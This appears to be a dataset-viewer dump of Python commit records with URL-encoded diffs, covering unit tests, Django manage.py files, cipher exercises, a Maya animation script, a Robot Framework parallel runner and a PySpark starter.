resp_data = json.loads(resp.data)%0A yield eq_, resp_data%5B'name'%5D, 'world' # does overwrite%0A%0A%0Adef test_ctx_proc_nonctx():%0A add_name = ContextProcessor(defaults=%7B'name': 'Kurt'%7D)%0A app = Application(%5B('/', hello_world)%5D,%0A middlewares=%5Badd_name%5D)%0A c = Client(app, BaseResponse)%0A resp = c.get('/')%0A yield eq_, resp.data, 'Hello, world!'%0A%0A%0A@raises(NameError)%0Adef test_ctx_proc_overlap():%0A ContextProcessor(required=%5B'name'%5D,%0A defaults=%7B'name': 'Alex'%7D)%0A%0A%0A@raises(NameError)%0Adef test_ctx_proc_reserved():%0A ContextProcessor(required=%5B'next'%5D)%0A%0A%0A@raises(TypeError)%0Adef test_ctx_proc_req_type():%0A ContextProcessor(required=%5B6%5D)%0A%0A%0A@raises(TypeError)%0Adef test_ctx_proc_default_type():%0A ContextProcessor(default=%7B6: ''%7D)%0A%0A%0A@raises(TypeError)%0Adef test_ctx_proc_def_nonmap():%0A ContextProcessor(defaults=%5B'hi', 'hello'%5D)%0A
|
|
f9bdf777a13404ba25e0e8cdf99a3554320529c9
|
Add warnings to inspector DOM count unittest baselines.
|
tools/telemetry/telemetry/core/backends/chrome/inspector_memory_unittest.py
|
tools/telemetry/telemetry/core/backends/chrome/inspector_memory_unittest.py
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry import benchmark
from telemetry.unittest import tab_test_case
class InspectorMemoryTest(tab_test_case.TabTestCase):
@benchmark.Enabled('has tabs')
def testGetDOMStats(self):
# Due to an issue with CrOS, we create a new tab here rather than
# using the existing tab to get a consistent starting page on all platforms.
self._tab = self._browser.tabs.New()
self.Navigate('dom_counter_sample.html')
counts = self._tab.dom_stats
self.assertEqual(counts['document_count'], 1)
self.assertEqual(counts['node_count'], 14)
self.assertEqual(counts['event_listener_count'], 2)
|
Python
| 0.000003
|
@@ -599,85 +599,439 @@
-counts = self._tab.dom_stats%0A self.assertEqual(counts%5B'document_count'%5D, 1
+# Document_count %3E 1 indicates that WebCore::Document loaded in Chrome%0A # is leaking! The baseline should exactly match the numbers on:%0A # unittest_data/dom_counter_sample.html%0A # Please contact kouhei@, hajimehoshi@ when rebaselining.%0A counts = self._tab.dom_stats%0A self.assertEqual(counts%5B'document_count'%5D, 1,%0A 'Document leak is detected! '+%0A 'The previous document is likely retained unexpectedly.'
)%0A
@@ -1073,16 +1073,50 @@
nt'%5D, 14
+,%0A 'Node leak is detected!'
)%0A se
@@ -1163,10 +1163,53 @@
unt'%5D, 2
+,%0A 'EventListener leak is detected!'
)%0A
|
3119222d27bd63b9f4e9a57ff8e9d88e53d9735a
|
Modify island.py
|
island.py
|
island.py
|
Python
| 0.000007
|
@@ -0,0 +1,271 @@
+from noise import generate_noise%0Afrom PIL import Image%0Aimport numpy as np%0A%0AWIDTH = 128%0AHEIGHT = 128%0A%0Aif __name__ == '__main__':%0A data = np.array(generate_noise(WIDTH, HEIGHT, triple=True), dtype=np.uint8)%0A img = Image.fromarray(data, 'RGB')%0A img.save('out.png')%0A
|
|
2d55503216d7020a71017fbcb2c1b48661c345cb
|
Add manage
|
manage.py
|
manage.py
|
Python
| 0.000001
|
@@ -0,0 +1,249 @@
+#!/usr/bin/env python%0Aimport os%0Aimport sys%0A%0Aif __name__ == %22__main__%22:%0A os.environ.setdefault(%22DJANGO_SETTINGS_MODULE%22, %22mysite.settings%22)%0A%0A from django.core.management import execute_from_command_line%0A%0A execute_from_command_line(sys.argv)%0A
|
|
77738a8b7e895b5f71418d5417db04f34b08f918
|
add manage.py
|
manage.py
|
manage.py
|
Python
| 0.000001
|
@@ -0,0 +1,242 @@
+#!/usr/bin/env python%0Aimport os%0Aimport sys%0A%0Aif __name__ == %22__main__%22:%0A os.environ.setdefault(%22DJANGO_SETTINGS_MODULE%22, %22settings%22)%0A%0A from django.core.management import execute_from_command_line%0A%0A execute_from_command_line(sys.argv)%0A
|
|
10ef7955b21e3f9d3f3ac9eb43995e7cf0e91201
|
Add meta/import_all.py for testing
|
meta/import_all.py
|
meta/import_all.py
|
Python
| 0
|
@@ -0,0 +1,1370 @@
+#! /usr/bin/env python%0A# encoding: utf-8%0A%22%22%22Imports all the modules under the specified path.%0A%0AThis can be useful as a basic static analysis test, assuming that the imports%0Ado not have side-effects.%0A%0A%22%22%22%0A%0Afrom __future__ import print_function%0A%0Aimport argparse%0Aimport importlib%0Aimport os%0Aimport sys%0A%0A%0Adef main():%0A parser = argparse.ArgumentParser(description=__doc__)%0A parser.add_argument(%0A %22PATH%22,%0A help=%22path to the package to import from%22)%0A parser.add_argument(%0A %22--verbose%22,%0A %22-v%22,%0A action=%22store_true%22)%0A args = parser.parse_args()%0A%0A parent_dir, package = os.path.split(args.PATH)%0A%0A # Python looks in sys.path to find modules to import, if we don't do this%0A # then it probably won't find any of the modules under parent_dir.%0A sys.path.append(os.path.abspath(parent_dir))%0A%0A os.chdir(parent_dir)%0A%0A for root, _, files in os.walk(package):%0A for f in files:%0A if not f.endswith('.py'):%0A continue%0A module_name = f%5B:-3%5D%0A module_list = root.split('/')%0A%0A if not module_name == '__init__':%0A module_list.append(module_name)%0A%0A module_ref = '.'.join(module_list)%0A if args.verbose:%0A print(module_ref)%0A importlib.import_module(module_ref)%0A%0A%0Aif __name__ == %22__main__%22:%0A sys.exit(main())%0A
|
|
efd125ef973a680b6413e820e1308070a79554b4
|
Encrypt with vigenere cipher
|
practic_stage/hmw8/main.py
|
practic_stage/hmw8/main.py
|
Python
| 0.007626
|
@@ -0,0 +1,462 @@
+import string%0A%0Aletters = string.ascii_uppercase%0A%0Avigenere_table = %7Bletter: %7Bletters%5Bj%5D: letters%5B(i + j) %25 26%5D%0A for j, l in enumerate(letters)%7D%0A for i, letter in enumerate(letters)%7D%0A%0A%0Adef encrypt(text, key):%0A encrypted = %5B%5D%0A for index, letter in enumerate(text):%0A encrypted.append(vigenere_table%5Bletter%5D%5Bkey%5Bindex%5D%5D)%0A return ''.join(encrypted)%0A%0ATEXT = %22ATTACKATDAWN%22%0AKEY = %22LEMONLEMONLE%22%0A%0Aprint encrypt(TEXT, KEY)%0A
|
|
5f63a5ebfe3210fe68df036eef27a51bf431f6a3
|
Initialize transpositionFileCipher
|
books/CrackingCodesWithPython/Chapter10/transpositionFileCipher.py
|
books/CrackingCodesWithPython/Chapter10/transpositionFileCipher.py
|
Python
| 0.00001
|
@@ -0,0 +1,2009 @@
+# Transposition Cipher Encrypt/Decrypt File%0A# https://www.nostarch.com/crackingcodes/ (BSD Licensed)%0A%0Aimport time, os, sys, transpositionEncrypt, transpositionDecrypt%0A%0Adef main():%0A inputFilename = 'frankenstein.txt'%0A # BE CAREFUL! If a file with the outputFilename name already exists,%0A # this program will overwrite that file:%0A outputFilename = 'frankenstein.encrypted.txt'%0A myKey = 10%0A myMode = 'encrypt' # Set to 'encrypt' or 'decrypt'%0A%0A # If the input file does not exist, the program terminates early:%0A if not os.path.exists(inputFilename):%0A print('The file %25s does not exist. Quitting...' %25 (inputFilename))%0A sys.exit()%0A%0A # If the output file already exists, give the user a chance to quit:%0A if os.path.exists(outputFilename):%0A print('This will overwrite the file %25s. (C)ontinue or (Q)uit?' %25 (outputFilename))%0A response = input('%3E ')%0A if not response.lower().startswith('c'):%0A sys.exit()%0A%0A # Read in the message from the input file:%0A fileObj = open(inputFilename)%0A content = fileObj.read()%0A fileObj.close()%0A%0A print('%25sing...' %25 (myMode.title()))%0A%0A # Measure how long the encryption/decryption takes:%0A startTime = time.time()%0A if myMode == 'encrypt':%0A translated = transpositionEncrypt.encryptMessage(myKey, content)%0A elif myMode == 'decrypt':%0A translated = transpositionDecrypt.decryptMessage(myKey, content)%0A totalTime = round(time.time() - startTime, 2)%0A print('%25sion time: %25s seconds' %25 (myMode.title(), totalTime))%0A%0A # Write out the translated message to the output file:%0A outputFileObj = open(outputFilename, 'w')%0A outputFileObj.write(translated)%0A outputFileObj.close()%0A%0A print('Done %25sing %25s (%25s characters).' %25 (myMode, inputFilename, len(content)))%0A print('%25sed file is %25s.' 
%25 (myMode.title(), outputFilename))%0A%0A%0A# If transpositionCipherFile.py is run (instead of imported as a module),%0A# call the main() function:%0Aif __name__ == '__main__':%0A main()%0A
|
|
fc8a37b63ddc2455afbeeae0a6c2ac911c113337
|
add new
|
maya/python/animation/grapheditor/fit_key_tangent.py
|
maya/python/animation/grapheditor/fit_key_tangent.py
|
Python
| 0.000002
|
@@ -0,0 +1,1156 @@
+#!/usr/bin/env python%0A# -*- coding: utf-8 -*-%0A# %0A# Author : Masahiro Ohmomo%0A# DCC : Maya%0A# Version : 2013 - Latest%0A# Recommend: 2013%0A# %0A# Description.%0A# In this script, do the fitting.%0A# The target is keyframe's tangent.%0A# You should be selected keyframe's of least two index.%0A#%0A# Run command.%0A# import fit_key_tangent%0A# fit_key_tangent.main()%0A#%0A%0Afrom maya import cmds, mel%0Aimport math%0A%0Adef rad_deg(value=0.0, rd=False):%0A%09if rd:%0A%09%09return 180.0*value/3.141592%0A%09else:%0A%09%09return 3.141592*value/180.0%0A%0Adef main():%0A%09names = cmds.keyframe(q=True, n=True)%0A%09for n in names:%0A%09%09frames = cmds.keyframe(n,q=True,sl=True)%0A%09%09values = cmds.keyframe(n,q=True,vc=True,sl=True)%0A%09%09countup = 0%0A%09%09for i in range(len(values)):%0A%09%09%09isLast = False%0A%09%09%09if len(values)-1 == countup:%0A%09%09%09%09x1,y1,x2,y2 = frames%5Bi%5D,values%5Bi%5D,frames%5Bi-1%5D,values%5Bi-1%5D%0A%09%09%09%09isLast=True%0A%09%09%09else:%0A%09%09%09%09x1,y1,x2,y2 = frames%5Bi%5D,values%5Bi%5D,frames%5Bi+1%5D,values%5Bi+1%5D%0A%09%09%09c_tan = rad_deg(math.atan((y2-y1)/(x2-x1)),True)%0A%09%09%09if not isLast:%0A%09%09%09%09cmds.keyTangent(n,e=True,a=True,t=(frames%5Bi%5D,frames%5Bi%5D),oa=c_tan)%0A%09%09%09else:%0A%09%09%09%09cmds.keyTangent(n,e=True,a=True,t=(frames%5Bi%5D,frames%5Bi%5D),ia=c_tan,oa=c_tan)%0A%09%09%09countup += 1
|
|
73fce6afc07496dcc79c2e2763523207c257185b
|
Update the docstring
|
rhea/vendor/device_clock_mgmt_prim.py
|
rhea/vendor/device_clock_mgmt_prim.py
|
from __future__ import absolute_import
import myhdl
from myhdl import instance, delay, always_comb
from rhea.system import timespec
@myhdl.block
def _clock_generate(clock, enable, ticks):
assert len(ticks) == 2
totticks = sum(ticks)
@instance
def mdlclk():
clock.next = False
while True:
if enable:
yield delay(ticks[0])
clock.next = True
yield delay(ticks[1])
clock.next = False
else:
yield delay(totticks)
return mdlclk
@myhdl.block
def device_clock_mgmt_prim(clkmgmt):
""" This is the generic device PLL module
The vendor specific implementations will set the v*_code attribute
for this function to the specific template needed to instantiate
the device primitive in the generated intermediate V*. This
module also creates the clocks for MyHDL simulation when the device
primitives are not available
"""
pif = clkmgmt
(clockin, reset, enable,
clocksout, locked,) = (pif.clockin, pif.reset, pif.enable,
pif.clocksout, pif.locked,)
clocksout.driven = True
locked.driven = True
# for simulation and modeling create the clocks defined
# by the `pll_intf`. For the implementation use verilog_code
clk_inst = []
for ii, clk in enumerate(clkmgmt.clocks):
totalticks = 1/(clk.frequency*timespec)
t1 = int(totalticks // 2)
# @todo: add detailed warnings about qunatization and timespec
# @todo: resolutions (i.e. funny clocks)
ticks = (t1, int(totalticks-t1))
clk_inst.append(_clock_generate(clk, enable, ticks))
print(" clock {} @ {:8.3f} MHz {}".format(
ii, clk.frequency/1e6, ticks))
@always_comb
def clk_assign():
clkmgmt.clockin_out.next = clockin
for ii, clk in enumerate(clkmgmt.clocks):
clocksout.next[ii] = clk
return clk_inst, clk_assign
|
Python
| 0.000061
|
@@ -656,19 +656,18 @@
PLL mod
-ul
e
+l
%0A The
@@ -872,14 +872,13 @@
-module
+block
als
@@ -967,16 +967,59 @@
vailable
+.%0A %0A not convetible, simulation only.
%0A %22%22%22
|
ea7c05a74a7d2b652bff7f3501be8e4a87e9fdef
|
Test suite setting and running all tests
|
proto/parallel/Parallel.py
|
proto/parallel/Parallel.py
|
import subprocess
from time import time
from random import randint
import os
import re
import sys
from robot.libraries import BuiltIn
from robot.utils import html_escape
class Parallel(object):
def __init__(self, runner_script, *arguments):
self._script = runner_script
self._arguments = list(arguments)
self._processes = []
def add_parallel_arguments(self, *args):
self._argumens += list(args)
def run_parallel_robot(self, test_name, *args):
args = self._arguments+list(args)
process = _ParaRobo(test_name, *args)
process.run(self._script)
self._processes.append(process)
return process
def wait_for_parallel_tests_to_be_ready(self, *processes):
failed = []
for process in processes:
rval = process.wait()
process.report()
if rval != 0:
failed.append(process.test)
if failed:
raise AssertionError("Following tests failed:\n%s" % "\n".join(failed))
def wait_for_all_parallel_tests_to_be_ready(self):
self.wait_for_parallel_tests_to_be_ready(*self._processes)
self._processes = []
class _ParaRobo(object):
def __init__(self, test, *args):
self._built_in = BuiltIn.BuiltIn()
id = "%s%s" % (time(), randint(0, 1000000))
self._output = 'output_%s.xml' % id
self._log = 'log_%s.html' % id
self.test = test
self._args = list(args)
self._output_dir = self._built_in.replace_variables("${OUTPUT DIR}")
self._monitor_out = os.path.join(self._output_dir, 'monitor_%s.txt' % id)
self._suite_name = self._built_in.replace_variables("${SUITE_NAME}")
def run(self, script):
with open(self._monitor_out, 'w') as monitor_file:
cmd = [script,
'--outputdir', self._output_dir,
'--output', self._output,
'--report', 'None',
'--log', self._log,
'--monitorcolors', 'off',
'--test', self.test.replace(' ', '').replace('/', '?')]+\
self._args
print "Starting test execution: %s" % " ".join(cmd)
self._process = subprocess.Popen(cmd,
shell=os.sep == '\\',
stdout=monitor_file,
stderr=monitor_file)
def wait(self):
return self._process.wait()
def report(self):
with open(self._monitor_out, 'r') as monitor_file:
monitor_output = monitor_file.read()
try:
os.remove(self._monitor_out)
except:
pass
match = re.search('^Log: (.*)$', monitor_output, re.MULTILINE)
monitor_output = html_escape(monitor_output)
if match:
monitor_output = monitor_output.replace(match.group(1), '<a href="%s#test_%s.%s">%s</a>' % (self._log, self._suite_name, self.test, match.group(1)))
monitor_output = self._add_colours(monitor_output)
print "*HTML* %s" % monitor_output
def _add_colours(self, output):
for name, colour in [("PASS", "pass"), ("FAIL", "fail"), ("ERROR", "fail")]:
output = output.replace(' %s ' % name, ' <span class="%s">%s</span> ' % (colour, name))
return output
|
Python
| 0
|
@@ -347,16 +347,43 @@
ses = %5B%5D
+%0A self._suite = None
%0A%0A de
@@ -471,63 +471,261 @@
def
-run_parallel_robot(self, test_name, *args):%0A arg
+set_suite_for_parallel_tests(self, suite):%0A self._suite = suite%0A%0A def run_parallel_robot(self, test_name, *args):%0A if self._suite is None:%0A self._suite = BuiltIn.BuiltIn().replace_variables('$%7BSUITE_SOURCE%7D')%0A argument
s =
@@ -742,32 +742,46 @@
ments+list(args)
++%5Bself._suite%5D
%0A process
@@ -808,16 +808,21 @@
me, *arg
+ument
s)%0A
@@ -914,16 +914,183 @@
rocess%0A%0A
+ def run_parallel_tests(self, *tests):%0A for test in tests:%0A self.run_parallel_robot(test)%0A self.wait_for_all_parallel_tests_to_be_ready()%0A%0A
def
|
ce1a4f7f55e03429dd0baf219fda71debc7e2ba2
|
add test to backup degraded
|
plenum/test/replica/test_replica_removing_with_backup_degraded.py
|
plenum/test/replica/test_replica_removing_with_backup_degraded.py
|
Python
| 0
|
@@ -0,0 +1,1988 @@
+import pytest%0A%0Afrom plenum.test.replica.helper import check_replica_removed%0Afrom stp_core.loop.eventually import eventually%0Afrom plenum.test.helper import waitForViewChange%0Afrom plenum.test.test_node import ensureElectionsDone%0A%0A%0Adef test_replica_removing_with_backup_degraded(looper,%0A txnPoolNodeSet,%0A sdk_pool_handle,%0A sdk_wallet_client,%0A tconf,%0A tdir,%0A allPluginsPath):%0A %22%22%22%0A 1. Start backup degraded.%0A 2. Check that degraded replicas%0A 3. Start View Change.%0A 4. Check that all replicas were restored.%0A %22%22%22%0A instance_to_remove = 1%0A start_replicas_count = txnPoolNodeSet%5B0%5D.replicas.num_replicas%0A for node in txnPoolNodeSet:%0A node.view_changer.on_backup_degradation(%5Binstance_to_remove%5D)%0A%0A # check that replicas were removed%0A def check_replica_removed_on_all_nodes():%0A for node in txnPoolNodeSet:%0A check_replica_removed(node,%0A start_replicas_count,%0A instance_to_remove)%0A%0A looper.run(eventually(check_replica_removed_on_all_nodes,%0A timeout=tconf.TolerateBackupPrimaryDisconnection * 4))%0A for node in txnPoolNodeSet:%0A assert not node.monitor.isMasterDegraded()%0A assert len(node.requests) == 0%0A%0A # start View Change%0A for node in txnPoolNodeSet:%0A node.view_changer.on_master_degradation()%0A waitForViewChange(looper, txnPoolNodeSet, expectedViewNo=1,%0A customTimeout=2 * tconf.VIEW_CHANGE_TIMEOUT)%0A ensureElectionsDone(looper=looper, nodes=txnPoolNodeSet)%0A # check that all replicas were restored%0A assert all(start_replicas_count == node.replicas.num_replicas%0A for node in txnPoolNodeSet)%0A
|
|
46be255fd0cfaeb2352f2f49b4ec5996a804768d
|
Add unit test for base Handler.
|
test/unit/handler/test_base.py
|
test/unit/handler/test_base.py
|
Python
| 0
|
@@ -0,0 +1,1519 @@
+# :coding: utf-8%0A# :copyright: Copyright (c) 2013 Martin Pengelly-Phillips%0A# :license: See LICENSE.txt.%0A%0Afrom mock import Mock%0A%0Afrom bark.log import Log%0Afrom bark.handler.base import Handler%0Afrom bark.formatter.base import Formatter%0A%0A%0Aclass Concrete(Handler):%0A '''Concrete subclass of abstract base for testing.'''%0A%0A def __init__(self, *args, **kw):%0A '''Initialise handler.'''%0A super(Concrete, self).__init__(*args, **kw)%0A self.data = %5B%5D%0A%0A def output(self, data):%0A '''Output formatted *data*.'''%0A self.data.append(data)%0A%0A%0Aclass Field(Formatter):%0A '''Format log into string of fields.'''%0A%0A def format(self, log):%0A '''Return string of log fields.'''%0A data = %5B%5D%0A for key, value in sorted(log.items()):%0A data.append('%7B0%7D=%7B1%7D'.format(key, value))%0A return ':'.join(data)%0A%0A%0Adef test_handle():%0A '''Test handle method.'''%0A handler = Concrete()%0A log = Log(message='A message')%0A handler.handle(log)%0A%0A assert handler.data == %5Blog%5D%0A%0A%0Adef test_filterer():%0A '''Test filterer prevents output of log.'''%0A deny_all = Mock()%0A deny_all.filter = Mock(return_value=True)%0A%0A handler = Concrete(filterer=deny_all)%0A log = Log(message='A message')%0A handler.handle(log)%0A%0A assert handler.data == %5B%5D%0A%0A%0Adef test_formatter():%0A '''Test formatting of data before output.'''%0A handler = Concrete(formatter=Field())%0A log = Log(message='A message')%0A handler.handle(log)%0A%0A assert handler.data == %5B'message=A message'%5D%0A
|
|
90e96e741bce834e3862a6ed84b22c6d45f64d3f
|
solve 11997
|
UVA/vol-119/11997.py
|
UVA/vol-119/11997.py
|
Python
| 0.999998
|
@@ -0,0 +1,607 @@
+from heapq import heapify, heappush, heappop%0Afrom sys import stdin, stdout%0A%0AI = list(map(int, stdin.read().split()))%0Aii = 0%0A%0Awhile ii %3C len(I):%0A N = I%5Bii%5D%0A%0A sums = I%5Bii+1: ii+1 + N%5D%0A sums.sort()%0A%0A for k in range(1, N):%0A X = I%5Bii+1 + k*N: ii+1 + k*N + N%5D%0A X.sort()%0A%0A q = list(-(s + X%5B0%5D) for s in sums)%0A heapify(q)%0A%0A for s in sums:%0A for j in range(1, N):%0A if s + X%5Bj%5D %3C -q%5B0%5D:%0A heappop(q)%0A heappush(q, -(s + X%5Bj%5D))%0A else: break%0A%0A for i in range(0, N):%0A sums%5BN-i-1%5D = -heappop(q)%0A%0A stdout.write(' '.join(map(str, sums)) + '%5Cn')%0A ii += N*N + 1%0A
|
|
40a83c5fc16facc0fa7e64752dd348c255f07754
|
add C/C++ building tools named `Surtr`
|
cplusplus/chaos/tools/surtr/Surtr.py
|
cplusplus/chaos/tools/surtr/Surtr.py
|
Python
| 0
|
@@ -0,0 +1,1760 @@
+#!/usr/bin/env python%0A# -*- coding: UTF-8 -*-%0A#%0A# Copyright (c) 2016 ASMlover. All rights reserved.%0A#%0A# Redistribution and use in source and binary forms, with or without%0A# modification, are permitted provided that the following conditions%0A# are met:%0A#%0A# * Redistributions of source code must retain the above copyright%0A# notice, this list ofconditions and the following disclaimer.%0A#%0A# * Redistributions in binary form must reproduce the above copyright%0A# notice, this list of conditions and the following disclaimer in%0A# the documentation and/or other materialsprovided with the%0A# distribution.%0A#%0A# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS%0A# %22AS IS%22 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT%0A# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS%0A# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE%0A# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,%0A# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,%0A# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;%0A# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER%0A# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT%0A# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN%0A# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE%0A# POSSIBILITY OF SUCH DAMAGE.%0Afrom __future__ import print_function%0A%0Aimport argparse%0A%0Adef get_options():%0A parser = argparse.ArgumentParser(description='Surtr C/C++ building tool')%0A parser.add_argument('option', nargs='?', help='config%7Cbuild%7Crebuild%7Cclean%7Cremove the project')%0A args = parser.parse_args()%0A return args.option%0A%0Adef main():%0A pass%0A%0Aif __name__ == '__main__':%0A main()%0A
|
|
ed57bed46a54bfd531e32a3c69a1f5e465f80662
|
add tests for parse_args
|
tests/test_tcurl.py
|
tests/test_tcurl.py
|
Python
| 0.000001
|
@@ -0,0 +1,904 @@
+from __future__ import absolute_import%0A%0Aimport pytest%0A%0Afrom tchannel.tcurl import parse_args%0A%0A%0A@pytest.mark.parametrize('input,expected', %5B%0A ( # basic case%0A '--host foo --profile',%0A %5B%5B'foo/'%5D, %5BNone%5D, %5BNone%5D, True%5D%0A ),%0A ( # multiple bodies, constant host/headers%0A '--host foo -d 1 2',%0A %5B%5B'foo/', 'foo/'%5D, %5B'1', '2'%5D, %5BNone, None%5D, False%5D%0A ),%0A ( # repeated host and body%0A '--host foo bar -d 1 2',%0A %5B%5B'foo/', 'bar/'%5D, %5B'1', '2'%5D, %5BNone, None%5D, False%5D%0A ),%0A ( # repeated host and body%0A '--host foo -d 1 --headers a b',%0A %5B%5B'foo/', 'foo/'%5D, %5B'1', '1'%5D, %5B'a', 'b'%5D, False%5D%0A ),%0A%5D)%0Adef test_parse_args(input, expected):%0A args = parse_args(input.split())%0A assert list(args.host) == expected%5B0%5D%0A assert list(args.body) == expected%5B1%5D%0A assert list(args.headers) == expected%5B2%5D%0A assert args.profile == expected%5B3%5D%0A
|
|
0a2c658d4d44a5c813b40d5040e101688eeac118
|
Update os.py
|
tendrl/node_agent/persistence/os.py
|
tendrl/node_agent/persistence/os.py
|
from tendrl.common.etcdobj.etcdobj import EtcdObj
from tendrl.common.etcdobj import fields
class Os(EtcdObj):
"""A table of the Os, lazily updated
"""
__name__ = 'nodes/%s/Os/'
node_uuid = fields.StrField("node_id")
os = fields.StrField("os")
os_version = fields.StrField("os_version")
kernel_version = fields.StrField("kernel_version")
selinux_mode = fields.StrField("selinux_mode")
def render(self):
self.__name__ = self.__name__ % self.node_id
return super(Os, self).render()
|
Python
| 0.000001
|
@@ -199,10 +199,8 @@
ode_
-uu
id =
|
dcc5065c7cc4cc167affcbf906eaf81e73fa6d3e
|
Add py solution for 645. Set Mismatch
|
py/set-mismatch.py
|
py/set-mismatch.py
|
Python
| 0.000168
|
@@ -0,0 +1,419 @@
+class Solution(object):%0A def findErrorNums(self, nums):%0A %22%22%22%0A :type nums: List%5Bint%5D%0A :rtype: List%5Bint%5D%0A %22%22%22%0A for i, n in enumerate(nums, 1):%0A while i != n and nums%5Bn - 1%5D != n:%0A nums%5Bi - 1%5D, nums%5Bn - 1%5D = nums%5Bn - 1%5D, nums%5Bi - 1%5D%0A n = nums%5Bi - 1%5D%0A for i, n in enumerate(nums, 1):%0A if i != n:%0A return %5Bn, i%5D%0A
|
|
236a25a159ea523c0b7d3eb009f6bf7df523d37f
|
Add py file used to build win64 binaries
|
pyinstalive_win.py
|
pyinstalive_win.py
|
Python
| 0
|
@@ -0,0 +1,75 @@
+from pyinstalive.__main__ import main%0Aif __name__ == '__main__':%0A main()
|
|
c806eb658e9a7088662fe7d520e3c59be6883099
|
Create pyspark_starter
|
pyspark_starter.py
|
pyspark_starter.py
|
Python
| 0.000001
|
@@ -0,0 +1,970 @@
+from pyspark import SparkConf, SparkContext%0A%0Aconf = SparkConf().setMaster(%22local%5B2%5D%22).setAppName(%22RDD Example%22)%0Asc = SparkContext(conf=conf)%0A%0A# different way of setting configurations %0A#conf.setMaster('some url')%0A#conf.set('spark.executor.memory', '2g')%0A#conf.set('spark.executor.cores', '4')%0A#conf.set('spark.cores.max', '40')%0A#conf.set('spark.logConf', True)%0A%0A# sparkContext.parallelize materializes data into RDD %0A# documentation: https://spark.apache.org/docs/2.1.1/programming-guide.html#parallelized-collections%0Ardd = sc.parallelize(%5B('Richard', 22), ('Alfred', 23), ('Loki',4), ('Albert', 12), ('Alfred', 9)%5D)%0A%0Ardd.collect() # %5B('Richard', 22), ('Alfred', 23), ('Loki', 4), ('Albert', 12), ('Alfred', 9)%5D%0A%0A# create two different RDDs%0Aleft = sc.parallelize(%5B(%22Richard%22, 1), (%22Alfred%22, 4)%5D)%0Aright = sc.parallelize(%5B(%22Richard%22, 2), (%22Alfred%22, 5)%5D)%0A%0Ajoined_rdd = left.join(right)%0Acollected = joined_rdd.collect()%0A%0Acollected #%5B('Alfred', (4, 5)), ('Richard', (1, 2))%5D%0A
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.